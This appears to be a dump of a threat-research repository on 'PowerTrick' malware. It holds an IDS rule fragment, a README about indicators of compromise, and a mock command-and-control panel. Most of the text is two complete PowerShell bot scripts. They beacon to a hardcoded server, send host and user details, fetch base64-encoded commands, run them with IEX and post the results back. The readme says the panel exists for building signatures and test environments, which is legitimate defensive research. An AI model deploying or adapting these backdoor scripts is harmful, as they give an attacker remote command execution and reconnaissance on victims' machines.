content:""?x=UDRZQ1ZRRVI4VVdwZnp4VkZtVlNEeUJMektMM3lWNmM""; http_uri; classtype:trojan-activity; sid:9000025; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 17 | 18 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PowerTrick 2 | This is a repository for the public blog with Labs indicators of compromise and code 3 | -------------------------------------------------------------------------------- /mock_panel/first.ps1: -------------------------------------------------------------------------------- 1 | $key='P4YCVQER8UWpfzxVFmVSDyBLzKL3yV6c'; 2 | $URL="http://192.168.1.91"; 3 | $timeout = 60; 4 | $uuid = (get-wmiobject Win32_ComputerSystemProduct).UUID; 5 | function b64e ($str) {if (!$str) { $str = '' };return [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($str));} 6 | function b64d ($str) {return [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($str))} 7 | function sendPostReq($a, $ps) { 8 | $ps.Add('p', $a); 9 | $ps.Add('p1', $key); 10 | $ps.Add('p2', (b64e -str $uuid)); 11 | $ps.Add('p9', (b64e -str $PID)); 12 | $WC = New-Object System.Net.WebClient 13 | $WC.UseDefaultCredentials = $true 14 | $Result = $WC.UploadValues($URL,"post", $NVC); 15 | $result = [System.Text.Encoding]::UTF8.GetString($Result) 16 | $WC.Dispose(); 17 | return $result; 18 | } 19 | Sleep $timeout 20 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 21 | $NVC.Add('p3', (b64e -str (Get-Item -Path ".\").FullName)); 22 | $res = (sendPostReq -a 'ip' -ps $NVC); 23 | if ($res -eq 'cex01' -Or $res -eq '') { 24 | taskkill /F /PID $PID 25 | return 26 | exit 27 | } else { 28 | $timeout = $res -replace "crx", "" 29 | } 30 | sleep $timeout; 31 | $working=$true 32 | while ($working) { 33 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 34 | $res = (sendPostReq -a 't' -ps $NVC); 35 | if ($res -ne '') { 36 | foreach($line in $res.Split([Environment]::NewLine)) { 37 | if ($line -ne '') { 38 | try { 39 | $decodedCommand = (b64d -str $line); 40 | $comm = $decodedCommand.Split([Environment]::NewLine); 41 | $exec = (b64d -str $comm[1]); 42 | $OutputVariable = (IEX "$exec") | Out-String; 43 | if ($? -eq $true) { 44 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 45 | $NVC.Add('p3', (b64e -str $OutputVariable)); 46 | $NVC.Add('p4', (b64e -str (Get-Item -Path ".\").FullName)); 47 | $NVC.Add('p5', (b64e -str $comm[0])); 48 | $res = (sendPostReq -a 'a' -ps $NVC); 49 | } else { 50 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 51 | $NVC.Add('p3', (b64e -str $error[0])); 52 | $NVC.Add('p4', (b64e -str (Get-Item -Path ".\").FullName)); 53 | $NVC.Add('p5', (b64e -str $comm[0])); 54 | $res = (sendPostReq -a 'a' -ps $NVC); 55 | } 56 | } catch { 57 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 58 | $NVC.Add('p3', (b64e -str $error[0])); 59 | $NVC.Add('p4', (b64e -str (Get-Item -Path ".\").FullName)); 60 | $res = (sendPostReq -a 'a' -ps $NVC); 61 | } 62 | $OutputVariable = ''; 63 | clear; 64 | } 65 | } 66 | } 67 | sleep $timeout; 68 | } 69 | -------------------------------------------------------------------------------- /mock_panel/generic_version.php: -------------------------------------------------------------------------------- 1 | 38 | -------------------------------------------------------------------------------- /mock_panel/index_first.php: -------------------------------------------------------------------------------- 1 | 44 | -------------------------------------------------------------------------------- /mock_panel/readme.txt: -------------------------------------------------------------------------------- 1 | This is a quick mock panel created with a single hardcoded command to execute on the bot, the intention was for it to be both too simple to be a ready made tool but also complete enough to be able to generate signatures and test environments. 2 | 3 | You can change the server IP in the bot script and it should work fine 4 | $URL="http://192.168.1.91"; 5 | 6 | If you don't want the log file in the php side then just remove it. 7 | 8 | 9 | Files: 10 | first.ps1 - ver1 of bot script 11 | index_first.php - php for ver1 of bot 12 | second.ps1 - more recent version of bot script 13 | generic_version.php - more generic php for both versions of bot 14 | -------------------------------------------------------------------------------- /mock_panel/second.ps1: -------------------------------------------------------------------------------- 1 | $key='P4YCVQER8UWpfzxVFmVSDyBLzKL3yV6c'; 2 | $URL="http://192.168.1.91"; 3 | $timeout = 60; 4 | $uuid = (get-wmiobject Win32_ComputerSystemProduct).UUID; 5 | function b64e ($str) {if (!$str) { $str = '' };return [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($str));} 6 | function b64d ($str) {return [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($str))} 7 | function sendPostReq($a, $ps) { 8 | $ps.Add('p', $a); 9 | $ps.Add('p1', $key); 10 | $ps.Add('p2', (b64e -str $uuid)); 11 | $ps.Add('p9', (b64e -str $PID)); 12 | $WC = New-Object System.Net.WebClient 13 | $WC.UseDefaultCredentials = $true 14 | $Result = $WC.UploadValues($URL,"post", $NVC); 15 | $result = [System.Text.Encoding]::UTF8.GetString($Result) 16 | $WC.Dispose(); 17 | return $result; 18 | } 19 | Sleep $timeout 20 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 21 | $NVC.Add('p3', (b64e -str "$($env:UserDomain)\$($env:UserName)")); 22 | $NVC.Add('p4', (b64e -str $env:ComputerName)); 23 | $NVC.Add('p5', (b64e -str (Get-Item -Path ".\").FullName)); 24 | $NVC.Add('p7', (b64e -str (Get-WmiObject -class Win32_OperatingSystem).Caption)); 25 | $NVC.Add('p8', (b64e -str (Get-WmiObject Win32_OperatingSystem).OSArchitecture)); 26 | $NVC.Add('p10', (b64e -str ([Security.Principal.WindowsIdentity]::GetCurrent().Name))); 27 | $res = (sendPostReq -a 'i' -ps $NVC); 28 | if ($res -eq 'cex01') { 29 | taskkill /F /PID $PID 30 | return 31 | exit 32 | } else { 33 | $timeout = $res -replace "crx", "" 34 | } 35 | sleep $timeout; 36 | $working=$true 37 | while ($working) { 38 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 39 | $res = (sendPostReq -a 't' -ps $NVC); 40 | if ($res -ne '') { 41 | foreach($line in $res.Split([Environment]::NewLine)) { 42 | if ($line -ne '') { 43 | try { 44 | $decodedCommand = (b64d -str $line); 45 | $comm = $decodedCommand.Split([Environment]::NewLine); 46 | $OutputVariable = (IEX (b64d -str $comm[1])) | Out-String; 47 | if ($?) { 48 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 49 | $NVC.Add('p3', (b64e -str $OutputVariable)); 50 | $NVC.Add('p4', (b64e -str (Get-Item -Path ".\").FullName)); 51 | $NVC.Add('p5', (b64e -str $comm[0])); 52 | $res = (sendPostReq -a 'a' -ps $NVC); 53 | } else { 54 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 55 | $NVC.Add('p3', (b64e -str $error[0])); 56 | $NVC.Add('p4', (b64e -str (Get-Item -Path ".\").FullName)); 57 | $NVC.Add('p5', (b64e -str $comm[0])); 58 | $res = (sendPostReq -a 'a' -ps $NVC); 59 | } 60 | } catch { 61 | $NVC = New-Object System.Collections.Specialized.NameValueCollection 62 | $NVC.Add('p3', (b64e -str $_)); 63 | $NVC.Add('p4', (b64e -str (Get-Item -Path ".\").FullName)); 64 | $res = (sendPostReq -a 'a' -ps $NVC); 65 | } 66 | $OutputVariable = ''; 67 | clear; 68 | } 69 | } 70 | } 71 | sleep $timeout; 72 | } 73 | --------------------------------------------------------------------------------